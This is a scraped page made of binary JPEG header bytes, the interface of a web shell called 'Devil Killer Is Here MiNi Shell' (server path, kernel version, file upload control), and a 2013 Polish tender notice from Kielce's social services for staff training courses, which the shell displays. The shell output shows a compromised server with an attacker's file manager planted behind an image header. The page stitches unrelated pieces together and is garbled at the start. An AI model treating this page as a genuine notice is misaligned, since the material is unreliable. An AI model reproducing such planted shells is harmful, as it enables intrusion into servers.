JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130926/391414-N-2013.html

<p class="kh_header"><b>Kielce: Studia podyplomowe oraz usługi szkoleniowe w ramach Projektu poprawa jakości usług opieki społecznej poprzez adaptację budynku na lokale aktywizacyjne dla osób niepełnosprawnych oraz podniesienie kwalifikacji zawodowych personelu Zespołu Placówek Kamyk w Kielcach 
oraz Studia podyplomowe oraz usługi szkoleniowe w ramach Projektu poprawa jakości usług opieki społecznej poprzez utworzenie lokali aktywizujących dla osób starszych i niepełnosprawnych oraz podniesienie kwalifikacji zawodowych personelu Domu Pomocy Społecznej im. Jana Pawła II w Kielcach</b><br>
<b>Numer ogłoszenia: 391414 - 2013; data zamieszczenia: 26.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie w Kielcach , ul. Studzienna 2, 25-544 Kielce, woj. świętokrzyskie, tel. 041 3312524, faks 041 3685057.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Studia podyplomowe oraz usługi szkoleniowe w ramach Projektu poprawa jakości usług opieki społecznej poprzez adaptację budynku na lokale aktywizacyjne dla osób niepełnosprawnych oraz podniesienie kwalifikacji zawodowych personelu Zespołu Placówek Kamyk w Kielcach 
oraz Studia podyplomowe oraz usługi szkoleniowe w ramach Projektu poprawa jakości usług opieki społecznej poprzez utworzenie lokali aktywizujących dla osób starszych i niepełnosprawnych oraz podniesienie kwalifikacji zawodowych personelu Domu Pomocy Społecznej im. Jana Pawła II w Kielcach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1: 
Oligofrenopedagogika( trzy semestry 355 godzin + 50 godzin praktyk) - 3 osoby

Część 2:
Asystent osoby starszej i niepełnosprawnej (dwa semestry, liczba godzin ogółem 280 wraz z praktyką zawodową) - 1 osoba

Część 3:
Resocjalizacja z elementami profilaktyki społecznej (dwa semestry, 330 godzin) - 5 osób
Część 4:  
Socjoterapia  (trzy semestry, 350 godzin + 150 godzin praktyki) - 1 osoba

Część 5:
Neurologopedia  (dwa semestry - 300 godzin) - 1 osoba

Część 6:
Interwencja asystenta rodziny w sytuacji kryzysu chronicznego (trzy semestry 320 godzin) - 2 osoby

Część 7:
Arteterapia -sztuki plastyczne z terapią zajęciową (3 semestry, 360 godzin zajęć dydaktycznych w formie: wykładów, ćwiczeń i warsztatów, 75 % zajęć to praca technikami warsztatowymi) - 1 osoba.

Cześć 8:
Specjalizacja z zakresu organizacji pomocy społecznej (dwa semestry 260 godzin) - 5 osób

Część 9:
Mediacje i negocjacje (dwa semestry 240 godzin) - 1 osoba

Część 10:
Kurs Zasady komunikacji z mieszkańcami z zaburzeniami procesów poznawczych 
(16 godz. zajęć ) - dla 18 osób (dwie grupy po 9 osób)

Część 11:
Kurs Sposoby i metody pracy z osobami niepełnosprawnymi   (32 godz. zajęć) - dla 18 osób (dwie grupy po 9 osób)

Część 12:
Kurs Seksualność osób niepełnosprawnych (16 godz. zajęć) - dla 18 osób (dwie grupy po 9 osób)

Część 13:
Kurs Diagnoza osób  niepełnosprawnych  w oparciu o Profil Psychoedukacyjny  PEPR (32 godzin zajęć) - dla 18 osób (dwie grupy po 9 osób)

Część 14:
Kurs Aktywizacja zawodowa osób niepełnosprawnych (8 godz. zajęć) - dla 18 osób (dwie grupy po 9 osób)

Część 15:
Kurs Opiekunka dziecięca i osoby starszej (24 godz. zajęć) - dla 18 osób (dwie grupy po 9 osób)

Część 16:
Kurs Zachowania agresywne i autoagresywne osób niepełnosprawnych (16 godz. zajęć) - dla 18 osób (dwie grupy po 9 osób)

Część 17:
Kurs Sytuacja społeczna osób niepełnosprawnych (16 godz. zajęć) - dla 18 osób (dwie grupy po 9 osób)

Część 18:
Metoda Bobath dla 1 osoby - Minimalna liczba godzin całego szkolenia powinna wynosić 110h. Termin rozpoczęcia szkolenia to III kwartał 2014 roku. Szkolenie musi odbywać się na terenie miasta Kielce lub w innym mieście na terenie Polski. Organizator zapewnia dojazd, powrót i zakwaterowanie podczas pobytu na szkoleniu jeżeli szkolenie odbywać się będzie w innym mieście niż Kielce.

Część 19:
Metoda Nordic Walking dla 2 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 15h. Szkolenie musi odbywać się na terenie miasta Kielce. Termin rozpoczęcia szkolenia to III kwartał 2014 roku.

Część 20:
Metoda laseroterapia dla 3 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 9h. Szkolenie musi odbywać się na terenie miasta Kielce. Termin rozpoczęcia szkolenia to II kwartał 2014 roku..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje wykonanie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy do 50% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0, 80.43.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 20.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części od 1 do 9
Na potwierdzenie niniejszego warunku należy złożyć oświadczenie, że uczelnia na której odbywać się będą zajęcia wpisana jest do rejestru uczelni prowadzonego przez Ministerstwo Edukacji i Szkolnictwa Wyższego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie niniejszego warunku należy złożyć oświadczenie zgodnie z załącznikiem do SIWZ.
Dla części od 10 do 17 
Na potwierdzenie należy złożyć; 
wykaz wykonanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie. 
Wykonawca potwierdzi spełnianie niniejszego warunku udziału w postępowaniu, jeżeli złoży wykaz wszystkich najważniejszych wykonanych w tym okresie usług, a w ramach tych usług wykonał minimum:
jeden zakończony warsztat / szkolenie dla każdej części na którą będzie składał ofertę z zakresu: aktywizacji zawodowej osób niepełnosprawnych lub opieki lub zajęć z psychologiem dla osób niepełnosprawnych na kwotę nie mniejszą niż 1 000,00 zł brutto każde;

Szkolenie grupowe to szkolenia dla minimum 9 osób.

Dla części 18:
Wykonawca potwierdzi spełnianie niniejszego warunku udziału w postępowaniu, jeżeli złoży wykaz wszystkich najważniejszych wykonanych w tym okresie usług, a w ramach tych usług wykonał minimum jedną usługę szkoleniową z tematu Metoda Bobath dla minimum 1 osoby.

Dla części 19: 
Wykonawca potwierdzi spełnianie niniejszego warunku udziału w postępowaniu, jeżeli złoży wykaz wszystkich najważniejszych wykonanych w tym okresie usług, a w ramach tych usług wykonał minimum jedną usługę szkoleniową z tematu Metoda Nordic Walking dla minimum  2 osób

Dla części 20:
Wykonawca potwierdzi spełnianie niniejszego warunku udziału w postępowaniu, jeżeli złoży wykaz wszystkich najważniejszych wykonanych w tym okresie usług, a w ramach tych usług wykonał minimum jedną usługę szkoleniową z tematu Metoda laseroterapia dla minimum  3 osób.

Do pozycji wykazu dotyczących opisanych wyżej szkoleń należy załączyć dowody określające, czy usługi te zostały wykonane w sposób należyty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części od 1 do 9 Na potwierdzenie niniejszego warunku należy złożyć oświadczenie zgodnie z załącznikiem do SIWZ.

Dla części od 10 do 20 wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia (przez doświadczenie należy rozumieć udział, jako wykładowca/trener w jednym zakończonym szkoleniu grupowym) oraz informacji o podstawie do dysponowania tymi osobami - Potwierdzeniem spełniania warunku będzie przedstawienie wykazu zawierającego nie mniej niż;

Wymagania minimalne kadry dydaktycznej
Część 10-
1.Zasady komunikacji z mieszkańcami z zaburzeniami procesów poznawczych - Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
Część 11-
2.Sposoby i metody pracy z osobami niepełnosprawnymi - Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
Część 12-
3.Seksualność osób niepełnosprawnych - Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
Część 13-
4.Diagnoza osób  niepełnosprawnych  w oparciu o Profil Psychoedukacyjny  PEPR - Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
Część 14-
5.Aktywizacja zawodowa osób niepełnosprawnych - Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
Część 15-
6.Opiekunka dziecięca i osoby starszej - Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
Część 16-
7.Zachowania agresywne i autoagresywne osób niepełnosprawnych - Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
Część 17-
8.Sytuacja społeczna osób niepełnosprawnych - Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
Część 18-
9.Metoda Bobath	- Minimum 1 osoba posiadająca wykształcenie wyższe - fizjoterapia, doświadczenie w prowadzeniu zajęć z metody Bobath
Część 19-
10.Metoda Nordic Walking - Minimum 1 osoba posiadająca wykształcenie wyższe, doświadczenie w prowadzeniu zajęć z metody Nordic Walking
Część 20-
11.Metoda laseroterapia - Minimum 1 osoba posiadająca wykształcenie wyższe, doświadczenie w prowadzeniu zajęć z laseroterapii</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta cenowa zgodna z załączonym drukiem Oferty cenowej - załącznik SIWZ.
Dla części od 10 do 17-Do oferty należy dołączyć programy szkoleń opracowane zgodnie z założeniami pkt. 3.2.1 oraz załącznika nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z zapisami określonymi w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Kielcach 
ul. Studzienna 2;   25-544 Kielce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2013 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego   - (MOPR w Kielcach ul. Studzienna 2 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Poprawa jakości usług opieki społecznej poprzez adaptację budynku na lokale aktywizujące dla osób niepełnosprawnych 
oraz podniesienie kwalifikacji zawodowych personelu Zespołu Placówek Kamyk w Kielcach.
Projekt współfinansowany przez Szwajcarię w ramach szwajcarskiego programu współpracy z nowymi krajami członkowskimi Unii Europejskiej
Improvement of social care services by converting a building into independence training facilities for disabled persons, as well as by improving professional qualifications of the staff at Kamyk Complex in Kielce.
Project supported by a grant from Switzerland through the Swiss Contribution to the enlarged European Union
Część 8, 9, 18, 19 i 20 realizowana jest w ramach Poprawa jakości usług opieki społecznej poprzez utworzenie lokali aktywizujących dla osób starszych i niepełnosprawnych oraz podniesienie kwalifikacji zawodowych personelu Domu Pomocy Społecznej im. Jana Pawła II w Kielcach 
Projekt współfinansowany Przez Szwajcarię w ramach szwajcarsko programu współpracy z nowymi krajami członkowskimi Unii Europejskiej
Improvement of social care services by creating independence training facilities for elderly and disabled persons, as well as by raising professional qualifications of the staff at John Paul II Social Care Home in Kielce.
Project supported by a grant from Switzerland through the Swiss Contribution to the enlarged European Union.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Oligofrenopedagogika.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1: 
Oligofrenopedagogika( trzy semestry 355 godzin + 50 godzin praktyk) - 3 osoby.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Asystent osoby starszej i niepełnosprawnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Asystent osoby starszej i niepełnosprawnej (dwa semestry, liczba godzin ogółem 280 wraz z praktyką zawodową) - 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Resocjalizacja z elementami profilaktyki społecznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Resocjalizacja z elementami profilaktyki społecznej (dwa semestry, 330 godzin) - 5 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Socjoterapia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Socjoterapia  (trzy semestry, 350 godzin + 150 godzin praktyki) - 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Neurologopedia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Neurologopedia  (dwa semestry - 300 godzin) - 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Interwencja asystenta rodziny w sytuacji kryzysu chronicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Interwencja asystenta rodziny w sytuacji kryzysu chronicznego (trzy semestry 320 godzin) - 2 osoby.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Arteterapia -sztuki plastyczne z terapią zajęciową.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arteterapia -sztuki plastyczne z terapią zajęciową (3 semestry, 360 godzin zajęć dydaktycznych w formie: wykładów, ćwiczeń i warsztatów, 75 % zajęć to praca technikami warsztatowymi) - 1 osoba..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Specjalizacja z zakresu organizacji pomocy społecznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Specjalizacja z zakresu organizacji pomocy społecznej (dwa semestry 260 godzin) - 5 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Mediacje i negocjacje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mediacje i negocjacje (dwa semestry 240 godzin) - 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Kurs Zasady komunikacji z mieszkańcami z zaburzeniami procesów poznawczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Zasady komunikacji z mieszkańcami z zaburzeniami procesów poznawczych 
(16 godz. zajęć ) - dla 18 osób (dwie grupy po 9 osób).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
